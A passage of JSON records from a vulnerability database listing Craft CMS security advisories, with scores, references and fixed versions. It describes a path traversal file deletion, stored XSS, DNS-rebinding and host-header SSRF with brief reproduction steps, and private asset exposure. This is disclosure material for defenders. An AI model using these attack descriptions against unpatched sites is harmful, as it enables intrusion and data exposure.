":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI
:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-6mrr-q3pj-h53w","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-24T17:57:07Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-6mrr-q3pj-h53w"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33159","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33159"},{"reference_url":"https://github.com/advisories/GHSA-6mrr-q3pj-h53w","reference_id":"GHSA-6mrr-q3pj-h53w","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-6mrr-q3pj-h53w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33159","GHSA-6mrr-q3pj-h53w"],"risk_score
":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-eaxm-rjr7-xudb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91685?format=json","vulnerability_id":"VCID-efwv-r3nc-73h9","summary":"Craft CMS has a Path Traversal Vulnerability in AssetsController\nThe `AssetsController->replaceFile()` method has a `targetFilename` body parameter that is used unsanitized in a `deleteFile()` call before `Assets::prepareAssetName()` is applied on save. This allows an authenticated user with `replaceFiles` permission to delete arbitrary files within the same filesystem root by injecting `../` path traversal sequences into the filename.\n\nThis could allow an authenticated user with `replaceFiles` permission on one volume to delete files in other folders/volumes that share the same filesystem root.\n\nThis only affects local filesystems.\n\nUsers should update to Craft 4.17.5 or 5.9.11 to mitigate the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32262","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12349","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32262"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/c997efbe4c66c14092714233aeebff15cdbfcf11","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{
"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T15:21:57Z/"}],"url":"https://github.com/craftcms/cms/commit/c997efbe4c66c14092714233aeebff15cdbfcf11"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-472v-j2g4-g9h2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T15:21:57Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-472v-j2g4-g9h2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32262","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32262"},{"reference_url":"https://github.com/advisories/GHSA-472v-j2g4-g9h2","reference_id":"GHSA-472v-j2g4-g9h2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-472v-j2g4-g9h2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113015?format=json","purl":"pkg:composer/craftcms/cms@5.9.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"v
ulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.11"}],"aliases":["CVE-2026-32262","GHSA-472v-j2g4-g9h2"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-efwv-r3nc-73h9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50859?format=json","vulnerability_id":"VCID-esma-wxje-eqh3","summary":"Craft CMS Vulnerable to Stored XSS via User Group Name in User Permissions Page\nA stored XSS vulnerability exists in the User Permissions page. The User Group name is rendered without proper HTML escaping in the permissions section, allowing an attacker to execute arbitrary JavaScript when another user views or edits a user's permissions.\n\n> [!NOTE]\n> This is a separate vulnerability from the previously reported \"[Stored XSS via User Group Name in User Settings Page](https://github.com/craftcms/cms/security/advisories/GHSA-2423-8xxj-wc3g)\" and \"[Multiple Stored XSS in User Group Edit Page](https://github.com/craftcms/cms/security/advisories/GHSA-vx7g-xw92-g4xj)\". 
This affects a different sink: the individual user's permissions page.","references":[{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"1.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"1.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://github.com/advisories/GHSA-g3hp-vvqf-8vw6","reference_id":"GHSA-g3hp-vvqf-8vw6","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g3hp-vvqf-8vw6"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-g3hp-vvqf-8vw6","reference_id":"GHSA-g3hp-vvqf-8vw6","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"1.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-g3hp-vvqf-8vw6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VC
ID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["GHSA-g3hp-vvqf-8vw6"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-esma-wxje-eqh3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50298?format=json","vulnerability_id":"VCID-fpea-e48p-kfbn","summary":"Craft CMS has Cloud Metadata SSRF Protection Bypass via DNS Rebinding\nThe SSRF validation in Craft CMS’s GraphQL Asset mutation performs DNS resolution **separately** from the HTTP request. 
This Time-of-Check-Time-of-Use (TOCTOU) vulnerability enables DNS rebinding attacks, where an attacker’s DNS server returns different IP addresses for validation compared to the actual request.\n\nThis is a bypass of the security fix for CVE-2025-68437 ([GHSA-x27p-wfqw-hfcc](https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc)) that allows access to all blocked IPs, not just IPv6 endpoints.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27127","reference_id":"","reference_type":"","scores":[{"value":"8e-05","scoring_system":"epss","scoring_elements":"0.00719","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-27127"},{"reference_url":"https://curl.se/libcurl/c/CURLOPT_RESOLVE.html","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://curl.se/libcurl/c/CURLOPT_RESOLVE.html"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/a4cf3fb63bba3249cf1e2882b18a2d29e77a8575","reference_id":"","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:
M/D:T/2026-02-28T02:12:07Z/"}],"url":"https://github.com/craftcms/cms/commit/a4cf3fb63bba3249cf1e2882b18a2d29e77a8575"},{"reference_url":"https://github.com/mogwailabs/DNSrebinder","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/mogwailabs/DNSrebinder"},{"reference_url":"https://github.com/nccgroup/singularity","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/nccgroup/singularity"},{"reference_url":"https://github.com/taviso/rbndr","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/taviso/rbndr"},{"reference_url":"https://unit42.paloaltonetworks.com/dns-rebinding","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://unit42.paloaltonetworks.com/dns-rebinding"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27127","reference_id":"CVE-2026-27127","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27127"},{"reference_url":"https://github.com/advisories/GHSA
-gp2f-7wcm-5fhx","reference_id":"GHSA-gp2f-7wcm-5fhx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gp2f-7wcm-5fhx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-gp2f-7wcm-5fhx","reference_id":"GHSA-gp2f-7wcm-5fhx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:12:07Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-gp2f-7wcm-5fhx"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc","reference_id":"GHSA-x27p-wfqw-hfcc","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:12:07Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-x27p-wfqw-hfcc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"
},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["CVE-2026-27127","GHSA-gp2f-7wcm-5fhx"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fpea-e48p-kfbn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91247?format=json","vulnerability_id":"VCID-fpke-p7sz-nfc9","summary":"Craft CMS may expose private assets through anonymous \"generate transform\" calls via transform URL\n### Summary\n\nAn unauthenticated user can call `assets/generate-transform` with a private `assetId`, receive a valid transform URL, and fetch transformed image bytes.\n\nThe endpoint is anonymous and does not enforce per-asset authorization before returning the transform URL.\n\n### Details\n\nRoot cause:\n- Anonymous endpoint accepts user-controlled asset reference.\n- It creates 
and returns a transform URL for that asset without checking access rights.\n- If the transform output is reachable, guest users can read content derived from private assets.\n\nWho is impacted:\n\n- Installations where private source assets can be transformed and transform URLs are reachable.\n\nSecurity consequence:\n\n  - Anonymous users can obtain content derived from private assets without authentication.\n\n### Resources\n\nhttps://github.com/craftcms/cms/commit/7290d91639e","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33160","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03997","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33160"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/7290d91639e5e3a4f7e221dfbef95c9b77331860"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.17.8","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/
2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.17.8"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.9.14","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.9.14"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-5pgf-h923-m958","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-5pgf-h923-m958"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33160","reference_id":"","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33160"},{"reference_url":"https://github.com/craftcms/cms/commit/7290d91639e","reference_id":"7290d91639e","reference_type":"","scores":[{"value":"2.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-26T19:31:42Z/"}],"url":"https://github.com/craftcms/cms/commit/7290d91639e"},{"reference_url":"https://github.com/advisorie
s/GHSA-5pgf-h923-m958","reference_id":"GHSA-5pgf-h923-m958","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-5pgf-h923-m958"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113238?format=json","purl":"pkg:composer/craftcms/cms@5.9.14","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-gzry-xtu5-ukhu"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.14"}],"aliases":["CVE-2026-33160","GHSA-5pgf-h923-m958"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fpke-p7sz-nfc9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89272?format=json","vulnerability_id":"VCID-gzry-xtu5-ukhu","summary":"Craft CMS has a host header injection leading to SSRF via resource-js endpoint\n### Summary\n\nThe `resource-js` endpoint in Craft CMS allows unauthenticated requests to proxy remote JavaScript resources. \nWhen `trustedHosts` is not explicitly restricted (default configuration), the application trusts the client-supplied Host header. \n\nThis allows an attacker to control the derived `baseUrl`, which is used in prefix validation inside `actionResourceJs()`. \nBy supplying a malicious Host header, the attacker can make the server issue arbitrary HTTP requests, leading to Server-Side Request Forgery (SSRF).\n\n### Details\n\nThe vulnerability exists in `AppController::actionResourceJs()`.\n\nThe function validates that the `url` parameter starts with `assetManager->baseUrl`. However, `baseUrl` is derived from the current request host. If `trustedHosts` is not configured, the Host header is fully attacker-controlled.\n\nAttack chain:\n\n1. 
Attacker sends request with controlled `Host` header.\n2. Application derives `baseUrl` from the malicious Host.\n3. `url` parameter is required to start with this `baseUrl`.\n4. Validation passes.\n5. Guzzle performs a server-side HTTP request to the attacker-controlled host.\n6. SSRF occurs.\n\nThis does not rely on string parsing bypass. It relies on Host header trust.\n\n### PoC (safe reproduction steps)\n\nEnvironment:\n- Craft CMS 5.9.12\n- Default configuration (no trustedHosts restriction)\n- Docker deployment\n\n1. Start a listener inside the container:\n   python3 -m http.server 9999\n\n2. Send a request to resource-js with a controlled Host header.\n\n3. Observe that the internal listener receives a request (OOB confirmation).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41130","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1631","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41130"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/ebe7e85f1c89700d64332f72492be2e9a594e783","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P